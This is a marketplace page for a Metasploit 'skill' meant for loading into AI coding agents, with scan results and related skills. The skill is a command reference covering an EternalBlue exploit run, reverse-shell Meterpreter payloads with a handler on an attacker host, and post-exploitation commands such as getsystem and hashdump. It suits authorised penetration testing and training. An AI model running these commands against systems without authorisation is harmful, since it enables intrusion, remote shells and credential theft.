aeondave/metasploit
offensive-tools/exploits/metasploit/SKILL.md
Auth/lab ref: Metasploit module reference; search/config/check, handler/session lab, msfconsole/msfvenom syntax, evidence capture.
$ install --global
skillsauthnpx skillsauth add aeondave/malskill metasploitInstall this skill globally with one command. Works with Claude Code, Cursor, and Windsurf.
Security Scan Results
3 of 9 scanners reported clean
Some scanners were skipped, did not run, or reported a non-clean status. Review each row below.
3
Scanners Passed
9
Scanners in report
Clean
TrivyContainer and dependency vulnerability scanner
95%
Clean
SemgrepStatic code analysis for vulnerabilities
95%
Clean
mcp-scan (Snyk)Model Context Protocol security validation
95%
Skipped
Snyk (dep)Open source security scanning
50%
Skipped
Socket.devSupply chain security analysis
50%
Skipped
VirusTotalMulti-engine malware detection
50%
Skipped
CrowdStrikeAdvanced threat intelligence
50%
Skipped
OSV-ScannerOpen Source Vulnerability database check
50%
Skipped
OWASP Dep-Check
50%
Last scanned: Jun 8, 2026, 5:15 AM9.9s1 file scanned
SKILL.md
- name:
- metasploit
- description:
- Auth/lab ref: Metasploit module reference; search/config/check, handler/session lab, msfconsole/msfvenom syntax, evidence capture.
- license:
- BSD-3-Clause
- compatibility:
- Linux, macOS, Windows; msfconsole and msfvenom reference context.
- author:
- AeonDave
- version:
- 1.0
Metasploit Framework
Exploit framework — find, configure, and fire exploits; manage sessions; automate post-exploitation.
Quick Start
# Start console (with DB)
msfdb init && msfconsole
# Start quiet
msfconsole -q
Core Workflow
msf6 > search type:exploit name:eternalblue
msf6 > use exploit/windows/smb/ms17_010_eternalblue
msf6 exploit(...) > info
msf6 exploit(...) > show options
msf6 exploit(...) > set RHOSTS 10.10.10.10
msf6 exploit(...) > set LHOST 10.10.14.5
msf6 exploit(...) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf6 exploit(...) > run
Search Syntax
search type:exploit platform:windows name:smb
search cve:2021-44228 # Log4Shell
search type:auxiliary name:scanner # Auxiliary scanners
search rank:excellent platform:linux # Only excellent-ranked
Module Types
| Type | Prefix | Use |
|------|--------|-----|
| exploit | exploit/ | Run exploit against target |
| auxiliary | auxiliary/ | Scanners, fuzzers, brute-force |
| post | post/ | Post-exploitation on session |
| payload | payload/ | Shellcode / stager |
| encoder | encoder/ | Payload obfuscation |
| nop | nop/ | NOP sleds |
Essential Commands
info # Module details, options, references
show options # Required/optional params
show payloads # Compatible payloads for this module
show targets # Supported target OS variants
set OPTION VALUE # Set option
setg OPTION VALUE # Set globally (persists across modules)
unset OPTION # Clear option
check # Test if target is vulnerable (if supported)
run / exploit # Fire
run -j # Run as background job
jobs # List running jobs
kill <id> # Kill a job
Payload Selection
# Staged (small stager, pulls stage over network — needs handler)
set PAYLOAD windows/x64/meterpreter/reverse_tcp
# Stageless (self-contained — works without handler running)
set PAYLOAD windows/x64/meterpreter_reverse_tcp
# Common payloads
windows/x64/meterpreter/reverse_tcp # Windows staged
windows/x64/shell_reverse_tcp # Windows raw shell
linux/x64/meterpreter/reverse_tcp # Linux staged
linux/x64/shell/reverse_tcp # Linux shell
python/meterpreter/reverse_tcp # Python target
Multi/Handler (Catch Reverse Shells)
use exploit/multi/handler
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 0.0.0.0
set LPORT 4444
run -j # Background — catches incoming connections
Sessions
sessions -l # List sessions
sessions -i 1 # Interact with session 1
sessions -u 1 # Upgrade shell to meterpreter
sessions -k 1 # Kill session
background # Background current session (Ctrl+Z)
Meterpreter Quick Reference
sysinfo # System info
getuid # Current user
getsystem # Attempt privilege escalation
getpid # Process ID
ps # Process list
migrate <PID> # Migrate to another process
shell # Drop to OS shell
upload file /path/ # Upload file
download /path/file # Download file
ls / pwd / cd # Filesystem navigation
hashdump # Dump SAM hashes (needs SYSTEM)
run post/multi/recon/local_exploit_suggester # Find privesc
Database Commands
db_nmap -sV -p- 10.10.10.10 # Nmap scan + store results
hosts # Show discovered hosts
services # Show discovered services
vulns # Show flagged vulnerabilities
creds # Show captured credentials
Resources
| File | When to load |
|------|--------------|
| references/msfvenom.md | Payload generation with msfvenom, encoders, formats |
| references/post-exploitation.md | Post modules, pivoting, credential extraction |
Related Skills
aeondave/vibe-audit-technique
development
VerifiedTrustedCommunity
White-box auditing methodology for AI-generated ('vibe-coded') applications. Focuses on modern stack misconfigurations (Supabase, Next.js, Vercel).
4SKILL.mdUpdated Jun 12, 2026
aeondave/source-review-technique
development
VerifiedTrustedCommunity
Hybrid AI/Deterministic SAST methodology for discovering zero-day vulnerabilities in source code. Orchestrates structural search with AI-driven data flow and sink validation.
4SKILL.mdUpdated Jun 12, 2026
aeondave/hardware-technique
development
VerifiedTrustedCommunity
Auth assessment: hardware/embedded methodology; UART/JTAG/SWD/SPI/I2C, firmware extraction, boot/debug paths, embedded OS evidence.
4SKILL.mdUpdated Jun 12, 2026
aeondave/container-technique
devops
VerifiedTrustedCommunity
Container methodology: Identifying containerization limits, Docker/K8s misconfigurations, and executing escapes to the host node.
4SKILL.mdUpdated Jun 12, 2026